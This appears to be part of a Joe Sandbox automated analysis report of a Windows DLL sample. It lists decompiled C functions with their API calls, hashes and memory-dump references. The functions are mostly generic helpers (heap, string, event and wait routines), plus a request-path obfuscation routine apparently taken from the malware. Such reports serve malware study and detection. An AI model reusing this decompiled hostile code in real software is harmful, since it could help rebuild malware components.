Opcode ID: b73a5a7babefd3cce85083063ef558ec8db790bb141c35d4412b4d750422daf2
Instruction ID: ab393b6595c0afe75f0c92a261d6203b07761cde7deefe57474a3dd8393ab518
Opcode Fuzzy Hash: b73a5a7babefd3cce85083063ef558ec8db790bb141c35d4412b4d750422daf2
Instruction Fuzzy Hash: 8E414875D00619CFCB18CF68C894AADBBF1BF48305B29852FE046A7350E779AA40DB25

Uniqueness

Uniqueness Score: -1.00%

Function 007D9956, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E007D9956(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x7dd144; // 0x7dad21
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E007D3727(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E007D6EF8(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E007D6CC8( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x007d9956
0x007d9956
0x007d9960
0x007d9966
0x007d9969
0x007d996d
0x007d9975
0x007d9978
0x007d9991
0x007d9994
0x007d9998
0x007d999c
0x007d999d
0x007d99a2
0x007d99a5
0x007d99ac
0x007d99b3
0x007d9a06
0x007d9a0f
0x007d9a12
0x007d9a4d
0x007d9a53
0x00000000
0x00000000
0x00000000
0x007d9a12
0x007d99b9
0x00000000
0x007d99c0
0x007d99ce
0x007d99d1
0x007d99d4
0x007d99e0
0x007d99e4
0x007d9a46
0x007d99e6
0x007d99e9
0x007d99ed
0x007d99ee
0x007d99ef
0x007d99f1
0x007d99f8
0x007d9a36
0x007d9a41
0x007d99fa
0x007d99fd
0x007d9a01
0x007d9a01
0x007d99f8
0x00000000
0x007d99e4
0x007d99b9
0x007d997d
0x007d9983
0x007d9988
0x007d998b
0x00000000
0x00000000
0x00000000
0x007d9a1b
0x007d9a23
0x007d9a2a
0x007d9a2a
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 007D996D
SetEvent.KERNEL32(?), ref: 007D997D
GetLastError.KERNEL32 ref: 007D9A06

Part of subcall function 007D6CC8: WaitForMultipleObjects.KERNEL32(00000002,007DAA1A,00000000,007DAA1A,?,?,?,007DAA1A,0000EA60), ref: 007D6CE3

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

GetLastError.KERNEL32(00000000), ref: 007D9A3B

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: d32aeacaf23361ef2e6a485867e47bb094157539196035a2efe81d18a8ecd1d5
Instruction ID: 4ea5ca59ac0fe89a06d497024b24d359d538ff5dd130b1388531f5698894a6f7
Opcode Fuzzy Hash: d32aeacaf23361ef2e6a485867e47bb094157539196035a2efe81d18a8ecd1d5
Instruction Fuzzy Hash: 353100B6900309EFDB21DF95CD8499EBBB8FB44340F50866BE645E2651D734AA44DF20

Uniqueness

Uniqueness Score: -1.00%

Function 007D575F, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E007D575F(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x7dd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x7dd250; // 0x97e8d0fb
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x7dd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x007d5767
0x007d576a
0x007d5770
0x007d5788
0x007d578c
0x007d578f
0x007d5791
0x007d5794
0x007d5796
0x007d5799
0x007d579b
0x007d579b
0x007d579d
0x007d57a8
0x007d57ad
0x007d57be
0x007d57c6
0x007d57cb
0x007d57ce
0x007d57d1
0x007d57d3
0x007d57d9
0x007d57dc
0x007d57dc
0x007d57dc
0x007d57e7
0x007d57ec
0x007d57f6

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,007D8419,00000000,?,?,007D987D,?,033B95B0), ref: 007D576A
RtlAllocateHeap.NTDLL(00000000,?), ref: 007D5782
memcpy.NTDLL(00000000,?,-00000008,?,?,?,007D8419,00000000,?,?,007D987D,?,033B95B0), ref: 007D57C6
memcpy.NTDLL(00000001,?,00000001), ref: 007D57E7

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 11726575780b4a2153de290efe17615c46d59a39b2a9bb7b569f5c088ab732a8
Instruction ID: 2878a6fbe7e18f771184ad765417f312a355b7cbca3d5c282d884e4a0fa71010
Opcode Fuzzy Hash: 11726575780b4a2153de290efe17615c46d59a39b2a9bb7b569f5c088ab732a8
Instruction Fuzzy Hash: 0D11E972A01215EFC7108B69DC88D9EBFBEEB84360B154277F505D7251EB78AE04C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 007D9111, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E007D9111(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E007D90BE(_t8, _t1);
				_t16 = E007D3727(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E007D44A8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E007D3727(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E007D6EF8(_t16);
				}
				return _t18;
			}

0x007d911c
0x007d911d
0x007d9120
0x007d9122
0x007d912d
0x007d9131
0x007d9136
0x007d913a
0x007d9142
0x007d9147
0x007d914f
0x007d914f
0x007d9158
0x007d915c
0x007d9162
0x007d9165
0x007d916b
0x007d916b
0x007d9173
0x007d9173
0x007d917a
0x007d917a
0x007d9185

APIs

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

Part of subcall function 007D44A8: wsprintfA.USER32 ref: 007D4504

lstrlen.KERNEL32(007D59DA,00000000,00000000,00000027,00000005,00000000,00000000,007D93BE,74666F53,00000000,007D59DA,007DD00C,?,007D59DA), ref: 007D9147
lstrcpy.KERNEL32(00000000,00000000), ref: 007D916B
lstrcat.KERNEL32(00000000,00000000), ref: 007D9173

Strings

Soft, xrefs: 007D911D, 007D9136

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 71144ded451ea9ee63e04629002b399c7dfd88aee0c845c39617173daaa4796d
Instruction ID: 8e96a2de43daa4c87bab229f65087695a513e92be4b961d5e249029ec9073bed
Opcode Fuzzy Hash: 71144ded451ea9ee63e04629002b399c7dfd88aee0c845c39617173daaa4796d
Instruction Fuzzy Hash: D4018F7610024BE7CB126B689C8DFAF3B79EF84355F048126FA4555201DA7DC945C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 007D48FE, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D48FE(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x007d4908
0x007d490c
0x007d4921
0x007d4925
0x007d4928
0x007d492e
0x007d4932
0x007d4935
0x007d4940
0x007d4937
0x007d4937
0x007d4937
0x007d4935
0x007d494e

APIs

memset.NTDLL ref: 007D490C
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,73BB81D0), ref: 007D4921
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 007D492E
CloseHandle.KERNEL32(?), ref: 007D4940

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 840bced288f137abbbae952f67422cd9fe34840e77ec19b59837210c99eabffb
Instruction ID: bfbebe33dc08ac88afbc20ad3b7a6ebc709fbd3fe46c7309e4ae4e322e4679ce
Opcode Fuzzy Hash: 840bced288f137abbbae952f67422cd9fe34840e77ec19b59837210c99eabffb
Instruction Fuzzy Hash: 0DF054F0505308BFD3205F26DCC4C27BBBCFB412D8B11852FF04581211D639AC098A74

Uniqueness

Uniqueness Score: -1.00%

Function 007D9426, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D9426() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x7dd26c; // 0x274
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x7dd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x7dd26c; // 0x274
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x7dd238; // 0x2fc0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x007d9426
0x007d942d
0x007d9477
0x007d9479
0x007d9479
0x007d9431
0x007d9437
0x007d943c
0x007d9440
0x007d9446
0x007d944d
0x00000000
0x00000000
0x007d944f
0x007d9454
0x00000000
0x00000000
0x00000000
0x007d9454
0x007d9456
0x007d945e
0x007d9461
0x007d9461
0x007d9467
0x007d946e
0x007d9471
0x007d9471
0x00000000

APIs

SetEvent.KERNEL32(00000274,00000001,007D80D9), ref: 007D9431
SleepEx.KERNEL32(00000064,00000001), ref: 007D9440
CloseHandle.KERNEL32(00000274), ref: 007D9461
HeapDestroy.KERNEL32(02FC0000), ref: 007D9471

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: d56a8e00dfd28522e28b4e7fa3695965c4b955229bb9703dc5918ddeeba01482
Instruction ID: 82b207ceef298264d2c309b555c29d816caf5025165a074b337c0fff3c609c0d
Opcode Fuzzy Hash: d56a8e00dfd28522e28b4e7fa3695965c4b955229bb9703dc5918ddeeba01482
Instruction Fuzzy Hash: E3F0A070B073029BD7206BB5AC4CB133BB8BB00761B44C602BE41D73A1DB6CDC00D5A8

Uniqueness

Uniqueness Score: -1.00%

Function 007D40BB, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E007D40BB(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x7dd32c; // 0x33b95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x7dd32c; // 0x33b95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x7dd030) {
					HeapFree( *0x7dd238, 0, _t8);
				}
				_t14[1] = E007D9A54(_v0, _t14);
				_t11 =  *0x7dd32c; // 0x33b95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x007d40bb
0x007d40bb
0x007d40c4
0x007d40d4
0x007d40d4
0x007d40d9
0x007d40de
0x00000000
0x00000000
0x007d40ce
0x007d40ce
0x007d40e0
0x007d40e4
0x007d40f6
0x007d40f6
0x007d4106
0x007d4109
0x007d410e
0x007d4112
0x007d4118

APIs

RtlEnterCriticalSection.NTDLL(033B9570), ref: 007D40C4
Sleep.KERNEL32(0000000A,?,007D59CF), ref: 007D40CE
HeapFree.KERNEL32(00000000,00000000,?,007D59CF), ref: 007D40F6
RtlLeaveCriticalSection.NTDLL(033B9570), ref: 007D4112

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 59c6bdd8c59da35009c037f9e8202d54657ac4c8bfc16233d0f369631eb56316
Instruction ID: bbefaeca7ad9991a8d69c232ade7bdd781e706c998fb694fb65267348df52df0
Opcode Fuzzy Hash: 59c6bdd8c59da35009c037f9e8202d54657ac4c8bfc16233d0f369631eb56316
Instruction Fuzzy Hash: 52F0D471606242DBEB219BA8DD89A167BF4AF14740B04C457FA01D7361D638EC00CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 007D3E16, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E007D3E16() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x7dd32c; // 0x33b95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x7dd32c; // 0x33b95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x7dd32c; // 0x33b95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x7de836) {
					HeapFree( *0x7dd238, 0, _t10);
					_t7 =  *0x7dd32c; // 0x33b95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x007d3e16
0x007d3e1f
0x007d3e2f
0x007d3e2f
0x007d3e34
0x007d3e39
0x00000000
0x00000000
0x007d3e29
0x007d3e29
0x007d3e3b
0x007d3e40
0x007d3e44
0x007d3e57
0x007d3e5d
0x007d3e5d
0x007d3e66
0x007d3e68
0x007d3e6c
0x007d3e72

APIs

RtlEnterCriticalSection.NTDLL(033B9570), ref: 007D3E1F
Sleep.KERNEL32(0000000A,?,007D59CF), ref: 007D3E29
HeapFree.KERNEL32(00000000,?,?,007D59CF), ref: 007D3E57
RtlLeaveCriticalSection.NTDLL(033B9570), ref: 007D3E6C

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: dfc650551156455e8bc4f6baab73978d56ecd9c45e1ccae50d81ca4d535c2558
Instruction ID: 4d167f1d0667fab74eab9e9af80432599013eb2efb0b7303662143e1e5e7f01e
Opcode Fuzzy Hash: dfc650551156455e8bc4f6baab73978d56ecd9c45e1ccae50d81ca4d535c2558
Instruction Fuzzy Hash: 00F0DA74602101DBEB259F68DC49E1577B4EB08340B44C01BE802DB3A0D73CEC00DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 007D14E8, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E007D14E8(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E007D3727(_t2);
				if(_t34 != 0) {
					_t30 = E007D3727(_t28);
					if(_t30 == 0) {
						E007D6EF8(_t34);
					} else {
						_t39 = _a4;
						_t22 = E007DA8B9(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E007DA8B9(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x007d14e8
0x007d14f2
0x007d14f4
0x007d14fa
0x007d14fa
0x007d1503
0x007d1507
0x007d1513
0x007d1517
0x007d158b
0x007d1519
0x007d1519
0x007d151d
0x007d1524
0x007d1527
0x007d1541
0x007d1530
0x007d1530
0x007d1534
0x007d1537
0x007d153c
0x007d153c
0x007d1546
0x007d156e
0x007d1574
0x007d1577
0x007d1548
0x007d154a
0x007d1552
0x007d155d
0x007d1562
0x007d1562
0x007d157e
0x007d1585
0x007d1586
0x007d1586
0x007d1517
0x007d1596

APIs

lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,007D7CEA,?,?,?,?,00000102,007D461F,?,?,00000000), ref: 007D14F4

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

Part of subcall function 007DA8B9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,007D1522,00000000,00000001,00000001,?,?,007D7CEA,?,?,?,?,00000102), ref: 007DA8C7
Part of subcall function 007DA8B9: StrChrA.SHLWAPI(?,0000003F,?,?,007D7CEA,?,?,?,?,00000102,007D461F,?,?,00000000,00000000), ref: 007DA8D1

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,007D7CEA,?,?,?,?,00000102,007D461F,?), ref: 007D1552
lstrcpy.KERNEL32(00000000,00000000), ref: 007D1562
lstrcpy.KERNEL32(00000000,00000000), ref: 007D156E

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: d865b01f10086c84e796191d685a08e30cdecc27cf26506e53e2a6d08873a906
Instruction ID: 2fc3d94034233de385e2933ae5bc7bab73a1701ecda6b46321d69e6493a15db3
Opcode Fuzzy Hash: d865b01f10086c84e796191d685a08e30cdecc27cf26506e53e2a6d08873a906
Instruction Fuzzy Hash: 6921AFB6500255FBCB029FA4DC88AAA7FB8EF45390B548066F9069B302D73DDA10D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 007D737F, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D737F(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E007D3727(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x007d7394
0x007d7398
0x007d73a2
0x007d73a9
0x007d73ac
0x007d73ae
0x007d73b6
0x007d73bb
0x007d73c9
0x007d73ce
0x007d73d8

APIs

lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,033B937C,?,007D3B9F,004F0053,033B937C,?,?,?,?,?,?,007D9F20), ref: 007D738F
lstrlenW.KERNEL32(007D3B9F,?,007D3B9F,004F0053,033B937C,?,?,?,?,?,?,007D9F20), ref: 007D7396

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,007D3B9F,004F0053,033B937C,?,?,?,?,?,?,007D9F20), ref: 007D73B6
memcpy.NTDLL(73B769A0,007D3B9F,00000002,00000000,004F0053,73B769A0,?,?,007D3B9F,004F0053,033B937C), ref: 007D73C9

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 1a32bbbd048471d9aa83748d4fdf78e19eada54caa19557472c4a8d897f5f208
Instruction ID: 4266ea734a371cda4be5e480d8b57c50ebbe8b8f93916b80a1aafb04a0b90a15
Opcode Fuzzy Hash: 1a32bbbd048471d9aa83748d4fdf78e19eada54caa19557472c4a8d897f5f208
Instruction Fuzzy Hash: A5F03C76900118FB8B11DFA9CC89C8ABBBCEE083547054063F908D7202EA35EA149BA1

Uniqueness

Uniqueness Score: -1.00%

Function 007D41B9, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(033B9978,00000000,00000000,745EC740,007D98A8,00000000), ref: 007D41C9
lstrlen.KERNEL32(?), ref: 007D41D1

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

lstrcpy.KERNEL32(00000000,033B9978), ref: 007D41E5
lstrcat.KERNEL32(00000000,?), ref: 007D41F0

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 571154cdcef1c2bd4852cd61897cad185ff7609b50c28e37a8aec7db3c9dcf36
Instruction ID: c75f7320ce872c624973f3f3d03418f58f779a22cc5775e3b9136f79650817c5
Opcode Fuzzy Hash: 571154cdcef1c2bd4852cd61897cad185ff7609b50c28e37a8aec7db3c9dcf36
Instruction Fuzzy Hash: FBE01273902666A787129FE4AC48C5FBBBDEF997617088417F700D3221C7299905CBE5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 6920 Parent PID: 6880 regsvr32.exeCOMMON

Executed Functions

Function 00F47DA3, Relevance: 34.7, APIs: 23, Instructions: 222
